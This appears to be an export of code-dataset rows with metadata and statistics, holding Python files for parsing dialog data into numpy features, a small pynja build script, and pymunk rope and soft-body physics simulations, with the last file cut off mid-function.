| 0.153302
| 0.150943
| 0.100236
| 0.845126
| 0.808766
| 0.805425
| 0.795204
| 0.795204
| 0.784984
| 0
| 0.039296
| 0.376973
| 10,579
| 332
| 69
| 31.864458
| 0.732666
| 0.028358
| 0
| 0.758197
| 0
| 0
| 0.057126
| 0.03217
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.036885
| 0
| 0.036885
| 0.004098
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5d0d9119e993b9c0751687fde356593fed17d456
| 11,776
|
py
|
Python
|
DialogFormatReader.py
|
tilde-nlp/pip2-next-dlg-action
|
652a2fc03f78cecc1ad32ce737916da2ff3f1688
|
[
"MIT"
] | null | null | null |
DialogFormatReader.py
|
tilde-nlp/pip2-next-dlg-action
|
652a2fc03f78cecc1ad32ce737916da2ff3f1688
|
[
"MIT"
] | null | null | null |
DialogFormatReader.py
|
tilde-nlp/pip2-next-dlg-action
|
652a2fc03f78cecc1ad32ce737916da2ff3f1688
|
[
"MIT"
] | 1
|
2020-09-30T07:15:35.000Z
|
2020-09-30T07:15:35.000Z
|
import sys
import numpy as np
import pandas as pd
import random
from itertools import chain
np.set_printoptions(edgeitems=30, linewidth=100000)
from Embeddings import Embeddings
def ResetEntitiesInHistory(history, entity):
    """Remove an entity from the entity-history list, mutating it in place.

    Entities whose key starts with '_' are stored in history as key+value,
    so for those every entry sharing the '_'-prefix is dropped.  Any other
    entity is removed by exact match when present; otherwise the history is
    left untouched.
    """
    if entity[0] == '_':
        # Drop every stored key+value entry that shares this '_' prefix.
        history[:] = [item for item in history if not item.startswith(entity)]
    elif entity in history:
        history.remove(entity)
def normalizeEmotions(dialog_line):
    """Hook for normalizing the emotion fields of a dialog line.

    Scaling valence/activation by 8.0 was tried and disabled because it did
    not improve results ("ar normalizēšanu nepaliek labāk"), so the line is
    currently returned unchanged.
    """
    # dialog_line['valence'] = dialog_line['valence'] / 8.0
    # dialog_line['activation'] = dialog_line['activation'] / 8.0
    return dialog_line
def readYamlDocs(path, vectorize=False, embobj=None,use_emotion=False):
    """Parse a multi-document YAML dialog file into a list of dialogs.

    Each dialog is a list of line dicts with keys 'entities',
    'prev_entities', 'intent', 'actor', 'action', 'valence', 'activation'.
    A synthetic '_step0_' bot line is prepended to every dialog.

    :param path: path of the YAML file (may contain several documents).
    :param vectorize: if True, embed user utterances via ``embobj``.
    :param embobj: object exposing ``getSentenceVector``; used only when
        ``vectorize`` is True.
    :param use_emotion: if True, read valence/activation from each line,
        jittering values equal to the neutral 4.0.
    :return: list of dialogs (each a list of line dicts).
    """
    dialogs = []
    from pathlib import Path
    from ruamel.yaml import YAML
    yaml = YAML(typ='safe',pure=True)
    # Read the whole file up front and blank out escaped quotes, which
    # otherwise trip up the YAML parser.
    with open(Path(path), 'r',True,'utf-8') as file:
        data = file.read().replace('\\"',' ')
        results=yaml.load_all(data)
        file.close()  # redundant inside `with`; kept as-is
    #results =yaml.load_all(Path(path)) fails with UnicodeDecodeError for non-latin characters
    n=0
    for dialog in results:
        #n=n+1
        #print(str(n))
        # Skip empty documents and the header document carrying 'botid'.
        if(dialog==None or 'botid' in dialog[0]):
            continue
        prev_entities = []
        dialog_lines = []
        # Synthetic first line marking the start of the dialog.
        dialog_line0={}
        dialog_line0['entities'] = []
        dialog_line0['prev_entities'] = []
        dialog_line0['intent'] = []
        dialog_line0['actor']='bot'
        dialog_line0['action']='_step0_'
        dialog_line0['valence']=4.0
        dialog_line0['activation']=4.0
        #dialog_line0['input_mode']='txt'
        dialog_lines.append(normalizeEmotions(dialog_line0))
        for line in dialog:
            dialog_line={}
            dialog_line['entities'] = []
            dialog_line['prev_entities'] = prev_entities
            dialog_line['intent'] = []
            dialog_line['action'] = '-'
            dialog_line['valence']=4.0
            dialog_line['activation']=4.0
            # dialog_line['input_mode']='txt'
            if 'entities' in line:
                for k, v in line['entities'].items():
                    # Empty value clears the entity from history; a key
                    # starting with '_' is stored as key+value and replaces
                    # previous entries sharing that prefix.
                    if len(str(v))==0:
                        ResetEntitiesInHistory(prev_entities,str(k))
                    elif str(k)[0]=='_':
                        ResetEntitiesInHistory(prev_entities,str(k))
                        dialog_line['entities'].append(str(k)+str(v).lower())
                    else:
                        dialog_line['entities'].append(str(k))
            if 'action' in line:
                dialog_line['action']=line['action']
            if 'actor' in line:
                dialog_line['actor']=line['actor']
                if line['actor']=='user':
                    if vectorize==True:
                        # Embed non-empty utterances into the intent vector.
                        if len(line['utterance'].strip(' \n\t'))>0:
                            dialog_line['intent'].extend(embobj.getSentenceVector(line['utterance'].strip(' \n\t')))
                    elif 'intents' in line :
                        dialog_line['intent']=line['intents']
            if 'entities' in dialog_line:
                # Accumulate the (deduplicated) entity history for the next line.
                prev_entities=list(set(dialog_line['entities'] + prev_entities))
            if use_emotion:
                if 'valence' in line:
                    dialog_line['valence']=float(line['valence'])
                    # NOTE(review): jitter assumed to apply only when the line
                    # provides a neutral 4.0 value — confirm original nesting.
                    if dialog_line['valence']==4.0:
                        dialog_line['valence']=dialog_line['valence']+random.randrange(-50, 50)/100
                if 'activation' in line:
                    dialog_line['activation']=float(line['activation'])
                    if dialog_line['activation']==4.0:
                        dialog_line['activation']=dialog_line['activation']+random.randrange(-50, 50)/100
            # if 'input_mode' in line:
            #     dialog_line['input_mode']=line['input_mode']
            dialog_lines.append(normalizeEmotions(dialog_line))
        if dialog_lines:
            dialogs.append(dialog_lines)
    return dialogs
def readJSONBuffer(jsontxt, vectorize=False, embobj=None, use_emotion=False):
    """Parse a JSON-encoded dialog (a JSON array of line objects) into the
    internal dialog representation used by the rest of this module.

    Mirrors readYamlDocs: each line dict carries 'entities',
    'prev_entities', 'intent', 'actor', 'action', 'valence', 'activation',
    and a synthetic '_step0_' bot line is prepended.

    :param jsontxt: JSON text containing a list of dialog line objects.
    :param vectorize: if True, embed user utterances via ``embobj``.
    :param embobj: object exposing ``getSentenceVector``; used only when
        ``vectorize`` is True.
    :param use_emotion: if True, read valence/activation from each line,
        jittering values equal to the neutral 4.0.
    :return: list containing a single dialog (a list of line dicts).
    """
    dialogs = []
    # BUG FIX: json.loads(..., encoding="utf-8") raises TypeError on
    # Python >= 3.9 (the parameter was removed); the parser detects the
    # encoding itself, which also makes the third-party simplejson
    # dependency unnecessary.
    import json
    results = json.loads(jsontxt)
    prev_entities = []
    dialog_lines = []
    # Synthetic first line marking the start of the dialog.
    dialog_line0 = {}
    dialog_line0['entities'] = []
    dialog_line0['prev_entities'] = []
    dialog_line0['intent'] = []
    dialog_line0['actor'] = 'bot'
    dialog_line0['action'] = '_step0_'
    dialog_line0['valence'] = 4.0
    dialog_line0['activation'] = 4.0
    dialog_lines.append(normalizeEmotions(dialog_line0))
    for line in results:
        dialog_line = {}
        dialog_line['entities'] = []
        dialog_line['prev_entities'] = prev_entities
        dialog_line['intent'] = []
        dialog_line['action'] = '-'
        dialog_line['valence'] = 4.0
        dialog_line['activation'] = 4.0
        if 'entities' in line:
            for k, v in line['entities'].items():
                # Empty value clears the entity from history; a key starting
                # with '_' is stored as key+value and replaces previous
                # entries sharing that prefix.
                if len(str(v)) == 0:
                    ResetEntitiesInHistory(prev_entities, str(k))
                elif str(k)[0] == '_':
                    ResetEntitiesInHistory(prev_entities, str(k))
                    dialog_line['entities'].append(str(k) + str(v).lower())
                else:
                    dialog_line['entities'].append(str(k))
        if 'action' in line:
            dialog_line['action'] = line['action']
        if 'actor' in line:
            dialog_line['actor'] = line['actor']
            if line['actor'] == 'user':
                if vectorize == True:
                    # Embed non-empty utterances into the intent vector.
                    if len(line['utterance'].strip(' \n\t')) > 0:
                        dialog_line['intent'].extend(embobj.getSentenceVector(line['utterance'].strip(' \n\t')))
                elif 'intents' in line:
                    dialog_line['intent'] = line['intents']
        if 'entities' in dialog_line:
            # Accumulate the (deduplicated) entity history for the next line.
            prev_entities = list(set(dialog_line['entities'] + prev_entities))
        if use_emotion:
            if 'valence' in line:
                dialog_line['valence'] = float(line['valence'])
                if dialog_line['valence'] == 4.0:
                    # NOTE(review): randrange(-1, 1) yields only -1 or 0 —
                    # confirm the intended jitter range.
                    dialog_line['valence'] = dialog_line['valence'] + random.randrange(-1, 1)
            if 'activation' in line:
                dialog_line['activation'] = float(line['activation'])
                if dialog_line['activation'] == 4.0:
                    dialog_line['activation'] = dialog_line['activation'] + random.randrange(-1, 1)
        dialog_lines.append(normalizeEmotions(dialog_line))
    dialogs.append(dialog_lines)
    return dialogs
def encodeToNP(dialogs, predCol, vectorize=False, embsize=300):
    """One-hot encode dialogs into numpy arrays and build the vocabulary.

    :param dialogs: list of dialogs (each a list of line dicts).
    :param predCol: column whose NEXT-line value becomes the prediction
        target y (last line targets the placeholder "-").
    :param vectorize: if True the 'intent' column is treated as a dense
        embedding of width ``embsize`` instead of being one-hot encoded.
    :param embsize: width of the intent embedding when ``vectorize``.
    :return: (list of per-dialog feature arrays, list of per-dialog target
        arrays, dict of unique values per column).
    """
    dfs = [pd.DataFrame(d) for d in dialogs]
    for d in dfs:
        # Replace missing cells with the "-" placeholder.
        d.values[d.values==None] = "-"
    df = pd.concat(dfs)
    isList = {}
    uniqueVals = {}
    cols = list(df)
    totalOffset = 0
    # offsets[i] is the first feature column used by cols[i].
    offsets = [0] * len(list(df))
    for i, col in enumerate(cols):
        if col == 'valence' or col == 'activation':
            # Scalar (non one-hot) columns occupy a single feature column.
            offsets[i]=totalOffset
            totalOffset +=1
        elif vectorize==False or (vectorize==True and col != 'intent'):
            # One-hot columns: list-valued cells contribute each element.
            if (df[col].apply(type) == list).any():
                isList[col] = True
                uniqueVals[col] = np.array(sorted(list(set(df[col].sum()))), dtype="object")
            else:
                isList[col] = False
                vals = df[col].unique()
                vals = vals[vals != np.array(None)]
                vals.sort()
                uniqueVals[col] = vals
            offsets[i] = totalOffset
            totalOffset += len(uniqueVals[col])
        else:
            # 'intent' under vectorize: dense embedding appended after all
            # one-hot columns, so it takes no offset space here.
            offsets[i]=totalOffset
    retval = []
    ys = []
    totalOffsetSentEmbedd=totalOffset
    if vectorize:
        totalOffsetSentEmbedd=totalOffsetSentEmbedd+embsize
    for d in dfs:
        arr = np.zeros(shape=(len(d), totalOffsetSentEmbedd + 1))  # add first dialog marker
        y = np.zeros(shape=(len(d), len(uniqueVals[predCol])))
        for line in range(len(d)):
            for i, col in enumerate(cols):
                if col == 'valence' or col == 'activation':  #columns that are not one-hot
                    arr[line, offsets[i]]=d.loc[line, col]
                elif vectorize==True and col == 'intent':
                    # Copy the dense intent embedding after the one-hot block.
                    idx=0
                    for val in d.loc[line, col]:
                        arr[line, totalOffset+idx]=val
                        idx += 1
                else:
                    if isList[col]:
                        for val in d.loc[line, col]:
                            arr[line, offsets[i] + np.where(uniqueVals[col] == val)[0][0]] = 1
                    else:
                        arr[line, offsets[i] + np.where(uniqueVals[col] == d.loc[line, col])[0][0]] = 1
            # Target is the predCol value of the NEXT line; "-" for the last.
            if line < len(d)-1:
                y[line, np.where(uniqueVals[predCol] == d.loc[line+1, predCol])[0][0]] = 1
            else:
                y[line, np.where(uniqueVals[predCol] == "-")[0][0]] = 1
        # First-line-of-dialog marker.
        # NOTE(review): with vectorize=True this writes into the first
        # embedding column rather than the extra marker column at
        # totalOffsetSentEmbedd — confirm intended.
        arr[0, totalOffset] = 1
        retval.append(arr)
        ys.append(y)
    return retval, ys, uniqueVals
def encodeToNPwithKnownUniqueVals(dialogs, predCol, uniqueVals, vectorize=False, embsize=300):
    """One-hot encode dialogs using a previously computed vocabulary.

    Companion to encodeToNP for inference time: the ``uniqueVals`` mapping
    produced at training time fixes the column layout, and unknown values
    are silently skipped (their one-hot stays all-zero).

    :param dialogs: list of dialogs (each a list of line dicts).
    :param predCol: column whose NEXT-line value becomes the target y.
    :param uniqueVals: dict of per-column vocabularies from encodeToNP.
    :param vectorize: if True the 'intent' column is a dense embedding of
        width ``embsize`` instead of one-hot.
    :param embsize: width of the intent embedding when ``vectorize``.
    :return: (list of per-dialog feature arrays, list of target arrays).
    """
    dfs = [pd.DataFrame(d) for d in dialogs]
    for d in dfs:
        # Replace missing cells with the "-" placeholder.
        d.values[d.values == None] = "-"
    df = pd.concat(dfs)
    isList = {}
    cols = list(df)
    totalOffset = 0
    # offsets[i] is the first feature column used by cols[i].
    offsets = [0] * len(list(df))
    for i, col in enumerate(cols):
        if col == 'valence' or col == 'activation':
            # Scalar (non one-hot) columns occupy a single feature column.
            offsets[i]=totalOffset
            totalOffset +=1
        elif vectorize==False or (vectorize==True and col != 'intent'):
            if (df[col].apply(type) == list).any():
                isList[col] = True
            else:
                isList[col] = False
            offsets[i] = totalOffset
            totalOffset += len(uniqueVals[col])
        else:
            # 'intent' under vectorize: dense embedding appended after all
            # one-hot columns, so it takes no offset space here.
            offsets[i]=totalOffset
    retval = []
    ys = []
    totalOffsetSentEmbedd=totalOffset
    if vectorize:
        totalOffsetSentEmbedd=totalOffsetSentEmbedd+embsize
    for d in dfs:
        arr = np.zeros(shape=(len(d), totalOffsetSentEmbedd + 1))  # add first dialog marker
        y = np.zeros(shape=(len(d), len(uniqueVals[predCol])))
        for line in range(len(d)):
            for i, col in enumerate(cols):
                if col == 'valence' or col == 'activation':  #columns that are not one-hot
                    arr[line, offsets[i]]=d.loc[line, col]
                elif vectorize==True and col == 'intent':
                    # Copy the dense intent embedding after the one-hot block.
                    idx=0
                    for val in d.loc[line, col]:
                        arr[line, totalOffset+idx]=val
                        idx += 1
                else:
                    # Linear scan instead of np.where: values absent from the
                    # known vocabulary are simply skipped.
                    if isList[col]:
                        for val in d.loc[line, col]:
                            for idx,valunique in enumerate(uniqueVals[col]):
                                if valunique == val:
                                    arr[line, offsets[i] + idx] = 1
                    else:
                        for idx,valunique in enumerate(uniqueVals[col]):
                            if valunique == d.loc[line, col]:
                                arr[line, offsets[i] + idx] = 1
            # Target is the predCol value of the NEXT line; "-" for the last.
            if line < len(d)-1:
                for idx,valunique in enumerate(uniqueVals[predCol]):
                    if valunique == d.loc[line+1, predCol]:
                        y[line, idx] = 1
            else:
                for idx,valunique in enumerate(uniqueVals[predCol]):
                    if valunique == "-":
                        y[line, idx] = 1
        # First-line-of-dialog marker.
        # NOTE(review): with vectorize=True this writes into the first
        # embedding column rather than the extra marker column — confirm.
        arr[0, totalOffset] = 1
        retval.append(arr)
        ys.append(y)
    return retval, ys
def main():
    """Entry point placeholder; this module is used as a library."""
    pass


if __name__ == "__main__":
    # Exit with main()'s return value, defaulting to 0 when it returns None.
    sys.exit(int(main() or 0))
| 35.684848
| 112
| 0.531844
| 1,314
| 11,776
| 4.663623
| 0.134703
| 0.094648
| 0.031984
| 0.031332
| 0.817396
| 0.811521
| 0.787369
| 0.767624
| 0.738087
| 0.700392
| 0
| 0.01672
| 0.334664
| 11,776
| 329
| 113
| 35.793313
| 0.765412
| 0.054603
| 0
| 0.777778
| 0
| 0
| 0.07747
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02682
| false
| 0.003831
| 0.034483
| 0.003831
| 0.08046
| 0.003831
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5d124a64a602d6bbb9b38ad3963f8db6e64141c1
| 92
|
py
|
Python
|
test2/code/a/a.py
|
fifoforlifo/pynja
|
73c5bc0eec02c7bd5bf0d60856c86dd3abb0e6fe
|
[
"Apache-2.0"
] | null | null | null |
test2/code/a/a.py
|
fifoforlifo/pynja
|
73c5bc0eec02c7bd5bf0d60856c86dd3abb0e6fe
|
[
"Apache-2.0"
] | null | null | null |
test2/code/a/a.py
|
fifoforlifo/pynja
|
73c5bc0eec02c7bd5bf0d60856c86dd3abb0e6fe
|
[
"Apache-2.0"
] | null | null | null |
import pynja

# Register each child build directory with pynja.
for subdir in ("a0", "a1", "a2"):
    pynja.import_subdir(subdir)
| 15.333333
| 25
| 0.771739
| 14
| 92
| 4.857143
| 0.428571
| 0.485294
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.034884
| 0.065217
| 92
| 5
| 26
| 18.4
| 0.755814
| 0
| 0
| 0
| 0
| 0
| 0.065217
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5d23cf44825b41a14d84fbacce6d438be8a7bc24
| 58,254
|
py
|
Python
|
physics_engine.py
|
YunzhuLi/CompositionalKoopmanOperators
|
116057b11192bb2fbea2b9af411cddcee354dae8
|
[
"MIT"
] | 56
|
2020-04-28T14:34:15.000Z
|
2022-03-18T13:22:31.000Z
|
physics_engine.py
|
YunzhuLi/CompositionalKoopmanOperators
|
116057b11192bb2fbea2b9af411cddcee354dae8
|
[
"MIT"
] | 4
|
2020-06-29T19:53:27.000Z
|
2021-04-05T05:18:40.000Z
|
physics_engine.py
|
YunzhuLi/CompositionalKoopmanOperators
|
116057b11192bb2fbea2b9af411cddcee354dae8
|
[
"MIT"
] | 8
|
2020-06-09T16:12:24.000Z
|
2021-11-15T21:43:57.000Z
|
import os
import cv2
import matplotlib.pyplot as plt
import numpy as np
import pymunk
from matplotlib.collections import PatchCollection
from matplotlib.colors import to_rgba
from matplotlib.patches import Circle, Polygon
from pymunk.vec2d import Vec2d
from utils import rand_float, rand_int, calc_dis, norm
class Engine(object):
    """Base class for the 2-D physics environments.

    Stores the integration timestep and the state/action/parameter
    dimensionalities, and defines the accessor contract.  Concrete engines
    override init(), step() and render().
    """

    def __init__(self, dt, state_dim, action_dim, param_dim):
        self.dt = dt
        self.state_dim = state_dim
        self.action_dim = action_dim
        self.param_dim = param_dim
        # Scene containers; filled in by the subclass init() hook.
        self.state = None
        self.action = None
        self.param = None
        self.init()

    def init(self):
        """Subclass hook: build the initial scene."""
        pass

    def get_param(self):
        """Return a copy of the current parameter vector."""
        return self.param.copy()

    def set_param(self, param):
        """Store a defensive copy of the given parameters."""
        self.param = param.copy()

    def get_state(self):
        """Return a copy of the current state."""
        return self.state.copy()

    def set_state(self, state):
        """Store a defensive copy of the given state."""
        self.state = state.copy()

    def get_scene(self):
        """Return copies of (state, param) as a pair."""
        return self.state.copy(), self.param.copy()

    def set_scene(self, state, param):
        """Store defensive copies of both state and parameters."""
        self.state = state.copy()
        self.param = param.copy()

    def get_action(self):
        """Return a copy of the current action."""
        return self.action.copy()

    def set_action(self, action):
        """Store a defensive copy of the given action."""
        self.action = action.copy()

    def d(self, state, t, param):
        """Time derivative of the state; unused in the base class."""
        pass

    def step(self):
        """Advance the simulation by one dt; subclass responsibility."""
        pass

    def render(self, state, param):
        """Visualize a state; subclass responsibility."""
        pass

    def clean(self):
        """Release resources; no-op by default."""
        pass
class RopeEngine(Engine):
    """Mass-spring rope simulated with pymunk.

    The rope is a vertical chain of point masses connected by damped
    springs (optionally with second-neighbour "bihop" springs); the head
    mass slides on a horizontal groove and receives the control impulse.
    param layout: [n_ball, init_x, k, damping, gravity].
    """

    def __init__(self, dt, state_dim, action_dim, param_dim,
                 num_mass_range=[4, 8], k_range=[500., 1500.], gravity_range=[-2., -8.],
                 position_range=[-0.6, 0.6], bihop=True):
        # state_dim = 4
        # action_dim = 1
        # param_dim = 5
        # param [n_ball, init_x, k, damping, gravity]
        self.radius = 0.06
        self.mass = 1.
        self.num_mass_range = num_mass_range
        self.k_range = k_range
        self.gravity_range = gravity_range
        self.position_range = position_range
        self.bihop = bihop  # whether to add second-neighbour springs
        super(RopeEngine, self).__init__(dt, state_dim, action_dim, param_dim)

    def init(self, param=None):
        """Build a rope scene; any None parameter entry is sampled."""
        if param is None:
            self.n_ball, self.init_x, self.k, self.damping, self.gravity = [None] * 5
        else:
            self.n_ball, self.init_x, self.k, self.damping, self.gravity = param
            self.n_ball = int(self.n_ball)
        num_mass_range = self.num_mass_range
        position_range = self.position_range
        if self.n_ball is None:
            self.n_ball = rand_int(num_mass_range[0], num_mass_range[1])
        if self.init_x is None:
            self.init_x = np.random.rand() * (position_range[1] - position_range[0]) + position_range[0]
        if self.k is None:
            self.k = rand_float(self.k_range[0], self.k_range[1])
        if self.damping is None:
            # Damping defaults to a fixed fraction of the stiffness.
            self.damping = self.k / 20.
        if self.gravity is None:
            self.gravity = rand_float(self.gravity_range[0], self.gravity_range[1])
        self.param = np.array([self.n_ball, self.init_x, self.k, self.damping, self.gravity])
        # print('Env Rope param: n_ball=%d, init_x=%.4f, k=%.4f, damping=%.4f, gravity=%.4f' % (
        #     self.n_ball, self.init_x, self.k, self.damping, self.gravity))
        self.space = pymunk.Space()
        self.space.gravity = (0., self.gravity)
        self.height = 1.0
        self.rest_len = 0.3
        self.add_masses()
        self.add_rels()
        self.state_prv = None

    @property
    def num_obj(self):
        # Number of simulated objects (masses in the rope).
        return self.n_ball

    def add_masses(self):
        """Create the point masses, stacked downward from (init_x, height)."""
        inertia = pymunk.moment_for_circle(self.mass, 0, self.radius, (0, 0))
        x = self.init_x
        y = self.height
        self.balls = []
        for i in range(self.n_ball):
            body = pymunk.Body(self.mass, inertia)
            body.position = Vec2d(x, y)
            shape = pymunk.Circle(body, self.radius, (0, 0))
            if i == 0:
                # fix the first mass to a specific height
                move_joint = pymunk.GrooveJoint(self.space.static_body, body, (-2, y), (2, y), (0, 0))
                self.space.add(body, shape, move_joint)
            else:
                self.space.add(body, shape)
            self.balls.append(body)
            y -= self.rest_len

    def add_rels(self):
        """Connect the masses with damped springs."""
        give = 1. + 0.075  # rest length is slightly longer than the spacing
        # add springs over adjacent balls
        for i in range(self.n_ball - 1):
            c = pymunk.DampedSpring(
                self.balls[i], self.balls[i + 1], (0, 0), (0, 0),
                rest_length=self.rest_len * give, stiffness=self.k, damping=self.damping)
            self.space.add(c)
        # add bihop springs
        if self.bihop:
            for i in range(self.n_ball - 2):
                c = pymunk.DampedSpring(
                    self.balls[i], self.balls[i + 2], (0, 0), (0, 0),
                    rest_length=self.rest_len * give * 2, stiffness=self.k * 0.5, damping=self.damping)
                self.space.add(c)

    def add_impulse(self):
        # Horizontal impulse applied to the groove-constrained head mass.
        impulse = (self.action[0], 0)
        self.balls[0].apply_impulse_at_local_point(impulse=impulse, point=(0, 0))

    def get_param(self):
        """Return the scene parameters as a 5-tuple."""
        return self.n_ball, self.init_x, self.k, self.damping, self.gravity

    def get_state(self):
        """Return an (n_ball, 4) array of [x, y, vx, vy] per mass.

        Velocities are finite-differenced against the previous recorded
        state (zero on the first call).
        """
        state = np.zeros((self.n_ball, 4))
        for i in range(self.n_ball):
            ball = self.balls[i]
            state[i] = np.array([ball.position[0], ball.position[1], ball.velocity[0], ball.velocity[1]])
        vel_dim = self.state_dim // 2
        if self.state_prv is None:
            state[:, vel_dim:] = 0
        else:
            # Finite-difference velocity overrides the solver's velocity.
            state[:, vel_dim:] = (state[:, :vel_dim] - self.state_prv[:, :vel_dim]) / self.dt
        return state

    def step(self):
        """Apply the current action and advance the simulation by dt."""
        self.add_impulse()
        self.state_prv = self.get_state()
        self.space.step(self.dt)

    def render(self, states, actions=None, param=None, video=True, image=False, path=None,
               act_scale=None, draw_edge=True, lim=(-2.5, 2.5, -2.5, 2.5), states_gt=None,
               count_down=False, gt_border=False):
        """Render a state trajectory to an AVI video and/or PNG frames.

        :param states: (time, n_ball, >=2) array of positions over time.
        :param actions: optional per-step actions drawn as arrows.
        :param video/image: which outputs to produce; ``path`` is the stem.
        :param states_gt: optional ground-truth states overlaid in red.
        :param count_down: draw a frames-remaining counter.
        """
        if video:
            video_path = path + '.avi'
            fourcc = cv2.VideoWriter_fourcc('M', 'J', 'P', 'G')
            print('Save video as %s' % video_path)
            out = cv2.VideoWriter(video_path, fourcc, 25, (640, 480))
        if image:
            image_path = path + '_img'
            print('Save images to %s' % image_path)
            os.system('mkdir -p %s' % image_path)
        c = ['royalblue', 'tomato', 'limegreen', 'orange', 'violet', 'chocolate', 'lightsteelblue']
        time_step = states.shape[0]
        n_ball = states.shape[1]
        if actions is not None and actions.ndim == 3:
            '''get the first ball'''
            actions = actions[:, 0, :]
        for i in range(time_step):
            fig, ax = plt.subplots(1)
            plt.xlim(lim[0], lim[1])
            plt.ylim(lim[2], lim[3])
            plt.axis('off')
            if draw_edge:
                # Draw the rope segments between consecutive masses.
                cnt = 0
                for x in range(n_ball - 1):
                    plt.plot([states[i, x, 0], states[i, x + 1, 0]],
                             [states[i, x, 1], states[i, x + 1, 1]],
                             '-', color=c[1], lw=2, alpha=0.5)
            circles = []
            circles_color = []
            for j in range(n_ball):
                circle = Circle((states[i, j, 0], states[i, j, 1]), radius=self.radius * 5 / 4)
                circles.append(circle)
                circles_color.append(c[0])
            pc = PatchCollection(circles, facecolor=circles_color, linewidth=0, alpha=1.)
            ax.add_collection(pc)
            if states_gt is not None:
                # Overlay ground-truth positions in a contrasting color.
                circles = []
                circles_color = []
                for j in range(n_ball):
                    circle = Circle((states_gt[i, j, 0], states_gt[i, j, 1]), radius=self.radius * 5 / 4)
                    circles.append(circle)
                    circles_color.append('orangered')
                pc = PatchCollection(circles, facecolor=circles_color, linewidth=0, alpha=1.)
                ax.add_collection(pc)
            if actions is not None:
                # Draw the control force on the head mass as an arrow.
                F = actions[i, 0] / 4
                normF = norm(F)
                if normF < 1e-10:
                    pass
                else:
                    ax.arrow(states[i, 0, 0] + F / normF * 0.1, states[i, 0, 1],
                             F, 0., fc='Orange', ec='Orange', width=0.04, head_width=0.2, head_length=0.2)
            ax.set_aspect('equal')
            font = {'family': 'serif',
                    'color': 'darkred',
                    'weight': 'normal',
                    'size': 16}
            if count_down:
                plt.text(-2.5, 1.5, 'CountDown: %d' % (time_step - i - 1), fontdict=font)
            plt.tight_layout()
            if video:
                fig.canvas.draw()
                # NOTE(review): np.fromstring is deprecated for binary data;
                # np.frombuffer is the modern equivalent — confirm upgrade.
                frame = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8, sep='')
                frame = frame.reshape(fig.canvas.get_width_height()[::-1] + (3,))
                frame = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)
                out.write(frame)
                if i == time_step - 1:
                    # Hold the final frame for a few extra ticks.
                    for _ in range(5):
                        out.write(frame)
            if image:
                plt.savefig(os.path.join(image_path, 'fig_%s.png' % i), bbox_inches='tight')
            plt.close()
        if video:
            out.release()
# ===================================================================
'''
For Soft and Swim
'''
def get_init_p_fish_8():
    """Return the fixed 8-box "fish" layout.

    Each row is (x, y, material) with material values alternating between
    2 (rigid) and 0 (actuated) down each of the two columns.
    """
    layout = [
        (0, 0, 2), (0, 1, 0), (0, 2, 2), (0, 3, 0),
        (1, 0, 2), (1, 1, 0), (1, 2, 2), (1, 3, 0),
    ]
    return np.array(layout, dtype=float)
def sample_init_p_flight(n_box, shape_type=None, aug=False, train=False,
                         min_offset=False, max_offset=False):
    """Sample a symmetric column layout of n_box boxes.

    Returns an (n_box, 3) array of rows [x, y, material] where material is
    0 = actuated, 1 = soft, 2 = rigid; at least two boxes are actuated.

    :param n_box: number of boxes; must be in [5, 10).
    :param shape_type: index into the candidate column layouts for n_box;
        sampled uniformly when None (otherwise taken modulo the count).
    :param aug: if True, randomly flip x/y and/or transpose the layout.
    :param train: unused here — TODO confirm it can be removed.
    :param min_offset: force each column offset to its minimum value.
    :param max_offset: force each column offset to its maximum value.
    """
    assert 5 <= n_box < 10
    # Candidate layouts: each inner list gives the box count per column.
    c_box_dict = {
        5: [[1, 3, 1], [2, 1, 2]],
        6: [[3, 3], [2, 2, 2]],
        7: [[2, 3, 2], [1, 2, 1, 2, 1], [2, 1, 1, 1, 2]],
        8: [[2, 2, 2, 2], [1, 2, 2, 2, 1], [2, 1, 2, 1, 2], [3, 2, 3]],
        9: [[2, 2, 1, 2, 2], [1, 2, 3, 2, 1], [2, 1, 3, 1, 2], [3, 3, 3]],
    }
    if shape_type is None:
        shape_type = rand_int(0, len(c_box_dict[n_box]))
    else:
        shape_type = shape_type % len(c_box_dict[n_box])
    c_box = c_box_dict[n_box][shape_type]
    init_p = np.zeros((n_box, 3))
    # Sample vertical offsets for the left half of the columns and mirror
    # them so the overall layout stays symmetric.
    y_offset = np.zeros(len(c_box))
    for i in range(1, (len(c_box) + 1) // 2):
        left = c_box[i - 1]
        right = c_box[i]
        y_offset[i] = rand_int(1 - right, left)
        if min_offset: y_offset[i] = 1 - right
        if max_offset: y_offset[i] = left
        y_offset[len(c_box) - i] = - y_offset[i]
        assert len(c_box) - i > i
    # Accumulate offsets into absolute base heights shifted to start at 0.
    y = np.zeros(len(c_box))
    for i in range(1, len(c_box)):
        y[i] = y[i - 1] + y_offset[i]
    y -= y.min()
    # print('y_offset', y_offset, 'y', y)
    # Assign materials at random; re-roll the whole layout until at least
    # two boxes are actuated (material 0).
    while True:
        idx = 0
        for i, c in enumerate(c_box):
            for j in range(c):
                # if not train:
                if False:  # disabled deterministic assignment, kept for reference
                    material = 2 if j < c - 1 or c == 1 else 0
                else:
                    r = np.random.rand()
                    # Material probabilities depend on position in the column.
                    if c == 1:
